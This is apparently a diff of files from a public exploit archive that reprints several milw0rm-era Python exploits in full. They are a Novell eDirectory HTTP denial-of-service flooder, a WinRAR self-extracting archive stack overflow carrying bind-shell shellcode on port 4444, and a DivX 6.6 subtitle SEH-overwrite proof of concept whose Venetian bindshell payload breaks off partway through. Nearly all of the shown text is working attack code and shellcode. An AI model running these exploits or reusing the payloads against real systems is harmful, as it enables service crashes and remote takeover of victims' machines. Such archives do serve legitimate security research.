-buff="B"*96000+" HTTP/1.1\r\n"
+buff="B"*96000+" HTTP/1.1\r\n"
-req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
+req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
-expl.send (req)
+expl.send (req)
-#data=expl.recv(1024)
+#data=expl.recv(1024)
-#print data
+#print data
-expl.close()
+expl.close()
-
+
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8081 ) )
+expl.connect ( ( sys.argv[1], 8081 ) )
-buff="B"*96000+" HTTP/1.1\r\n"
+buff="B"*96000+" HTTP/1.1\r\n"
-req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
+req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
-expl.send (req)
+expl.send (req)
-#data=expl.recv(1024)
+#data=expl.recv(1024)
-#print data
+#print data
-expl.close()
+expl.close()
-
+
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8081 ) )
+expl.connect ( ( sys.argv[1], 8081 ) )
-buff="B"*96000+" HTTP/1.1\r\n"
+buff="B"*96000+" HTTP/1.1\r\n"
-req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
+req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
-expl.send (req)
+expl.send (req)
-#data=expl.recv(1024)
+#data=expl.recv(1024)
-#print data
+#print data
-expl.close()
+expl.close()
-
+
-while 1:
+while 1:
-
+
-	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-	expl.connect ( ( sys.argv[1], 8081 ) )
+	expl.connect ( ( sys.argv[1], 8081 ) )
-	buff="B"*243
+	buff="B"*243
-	req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
+	req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	expl.send (req)
+	expl.send (req)
-	data=expl.recv(1024)
+	data=expl.recv(1024)
-	print data
+	print data
-	expl.close()
+	expl.close()
-
+
-	sleep(0.1)
+	sleep(0.1)
-
+
-# milw0rm.com [2008-04-02]
+# milw0rm.com [2008-04-02]
--- a/platforms/windows/dos/5344.py
+++ b/platforms/windows/dos/5344.py
@ -1,21 +1,21 @@
-#!/usr/bin/python
+#!/usr/bin/python
-# Novel eDirectory HTTP DOS
+# Novel eDirectory HTTP DOS
-# Discovered and coded by Mati Aharoni
+# Discovered and coded by Mati Aharoni
-# muts..at..offensive-security.com
+# muts..at..offensive-security.com
-# http://www.offensive-security.com/0day/novel-edir.py.txt
+# http://www.offensive-security.com/0day/novel-edir.py.txt
-
+
-import socket
+import socket
-import os
+import os
-import sys
+import sys
-from time import sleep
+from time import sleep
-
+
-biff="<"*2048
+biff="<"*2048
-print "[*] Payload sent "+ str(len(buff))
+print "[*] Payload sent "+ str(len(buff))
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8028 ) )
+expl.connect ( ( sys.argv[1], 8028 ) )
-expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
+expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
-data=expl.recv(1024)
+data=expl.recv(1024)
-print data
+print data
-expl.close()
+expl.close()
-
+
-# milw0rm.com [2008-04-02]
+# milw0rm.com [2008-04-02]
--- a/platforms/windows/dos/599.py
+++ b/platforms/windows/dos/599.py
@ -28,6 +28,6 @@ try:
 	s.close()
 	print "\nRun this script again, and server should crash."
 except:
-	print "\nCould not connect to sever!"
+	print "\nCould not connect to sever!"
-
+
-# milw0rm.com [2004-10-26]
+# milw0rm.com [2004-10-26]
--- a/platforms/windows/local/1985.py
+++ b/platforms/windows/local/1985.py
@ -1,86 +1,86 @@
-"""
+"""
-WinRAR - Stack Overflows in SelF - eXtracting Archives
+WinRAR - Stack Overflows in SelF - eXtracting Archives
-======================================================
+======================================================
-
+
-Tested Version(s)..: WinRAR 3.60 beta 4
+Tested Version(s)..: WinRAR 3.60 beta 4
-Original Author.............: posidron
+Original Author.............: posidron
-Shellcode Stuffing .........: muts
+Shellcode Stuffing .........: muts
-
+
-"""
+"""
-
+
-import os, sys
+import os, sys
-
+
-winrar__ = 'C:\WinRAR.exe'
+winrar__ = 'C:\WinRAR.exe'
-sfxnfo__ = "comment.txt"
+sfxnfo__ = "comment.txt"
-result__ = "sample.exe"
+result__ = "sample.exe"
-
+
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
-
+
-sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
+sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
-sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
+sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
-sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
+sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
-sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
+sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
-sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
+sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
-sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
+sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
-sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
+sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
-sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
+sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
-sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
+sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
-sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
+sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
-sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
+sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
-sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
+sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
-sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
+sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
-sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
+sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
-sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
+sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
-sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
+sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
-sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
+sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
-sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
+sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
-sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
+sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
-sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
+sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
-sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
+sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
-sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
+sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
-sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
+sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
-sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
+sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
-sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
+sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
-sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
+sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
-sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
+sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
-sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
+sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
-sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
+sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
-sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
+sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
-sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
+sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
-sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
+sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
-sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
+sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
-sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
+sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
-sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
+sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
-sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
+sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
-sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
+sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
-sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
+sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
+sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
-sc +="\x4f\x4f\x42\x4d\x5a"
+sc +="\x4f\x4f\x42\x4d\x5a"
-
+
-buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
+buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
-
+
-try:
+try:
-    info = open(sfxnfo__, "w+b")
+    info = open(sfxnfo__, "w+b")
-    info.write(buf)
+    info.write(buf)
-    info.close()
+    info.close()
-except IOError:
+except IOError:
-    sys.exit("Error: unable to create: " + sfxnfo__)
+    sys.exit("Error: unable to create: " + sfxnfo__)
-
+
-print "Creating archive:",
+print "Creating archive:",
-os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
+os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
-os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
+os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
-print "done."
+print "done."
-print "Executing:",
+print "Executing:",
-# debug only!
+# debug only!
-#os.spawnv(os.P_WAIT, result__, [result__, ""])
+#os.spawnv(os.P_WAIT, result__, [result__, ""])
-#print "done."
+#print "done."
-print "Cleaning up:",
+print "Cleaning up:",
-os.remove(sfxnfo__)
+os.remove(sfxnfo__)
-print "done."
+print "done."
-
+
-# milw0rm.com [2006-07-05]
+# milw0rm.com [2006-07-05]
--- a/platforms/windows/local/5462.py
+++ b/platforms/windows/local/5462.py
@ -1,165 +1,165 @@
-#!/usr/bin/python
+#!/usr/bin/python
-#######################################################################
+#######################################################################
-# DivX 6.6 SRT SEH overwrite PoC
+# DivX 6.6 SRT SEH overwrite PoC
-# Tested on XP SP2
+# Tested on XP SP2
-# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
+# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
-# muts..at..offensive-security...dot..com
+# muts..at..offensive-security...dot..com
-# chris..at..offensive-security...dot..com
+# chris..at..offensive-security...dot..com
-# http://www.offensive-security.com/0day/divx66.py.txt
+# http://www.offensive-security.com/0day/divx66.py.txt
-# Notes: Unicode buffer - real pita.
+# Notes: Unicode buffer - real pita.
-# Greetz to our wives - thanks for the couch!
+# Greetz to our wives - thanks for the couch!
-#######################################################################
+#######################################################################
-# Microsoft Windows XP [Version 5.1.2600]
+# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
+# (C) Copyright 1985-2001 Microsoft Corp.
-#
+#
-# C:\Documents and Settings\Administrator\Desktop>
+# C:\Documents and Settings\Administrator\Desktop>
-#######################################################################
+#######################################################################
-# file = name of avi video file
+# file = name of avi video file
-file="infidel.srt"                           
+file="infidel.srt"                           
-
+
-# Unicode friendly POP POP RET somewhere in DivX 6.6
+# Unicode friendly POP POP RET somewhere in DivX 6.6
-# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
+# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
-
+
-ret="\x94\x48"
+ret="\x94\x48"
-
+
-# Align stack for register save
+# Align stack for register save
-nudge="\x48\x6d"
+nudge="\x48\x6d"
-
+
-# Payload building blocks
+# Payload building blocks
-
+
-buffer="\x41" * 1032
+buffer="\x41" * 1032
-
+
-xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
+xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
-
+
-pushad="\x60\x6d" # Save stack registers,nop
+pushad="\x60\x6d" # Save stack registers,nop
-
+
-pushfd="\x9c\x6d" 
+pushfd="\x9c\x6d" 
-
+
-align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
+align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
-
+
-align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
+align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
-
+
-popfd="\x9D\x6D" # popfd,nop
+popfd="\x9D\x6D" # popfd,nop
-
+
-popad="\x61\x6D"# popad,nop
+popad="\x61\x6D"# popad,nop
-
+
-padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
+padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
-
+
-rest= "\x01" * 5000000 # Buffer and shellcode canvas 
+rest= "\x01" * 5000000 # Buffer and shellcode canvas 
-
+
-# PoC Venetian Bindshell on port 4444 - ph33r
+# PoC Venetian Bindshell on port 4444 - ph33r
-# Built on alternating 00 01 surface
+# Built on alternating 00 01 surface
-# Venetian self decoding bindshell  - 1580 bytes
+# Venetian self decoding bindshell  - 1580 bytes
-
+
-bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
+bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
-"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
+"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
-"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
+"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
-"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
+"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
-"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
+"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
-"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
+"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
-"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
+"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
-"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
+"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
-"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
+"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
-"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
+"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
-"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
+"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
-"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
+"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
-"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
+"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
-"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
+"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
-"\x40\x6D\x80\xBF\x6D\x40\x6D"
+"\x40\x6D\x80\xBF\x6D\x40\x6D"
-"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
+"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
-"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
+"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
-"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
+"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
-"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
+"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
-"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
+"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
-"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
+"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
-"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
+"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
-"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
+"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
-"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
+"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
-"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
+"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
-"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
+"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
-"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
+"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
-"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
+"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
-"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
+"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
-"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
+"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
-"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
+"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
-"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
+"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
-"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
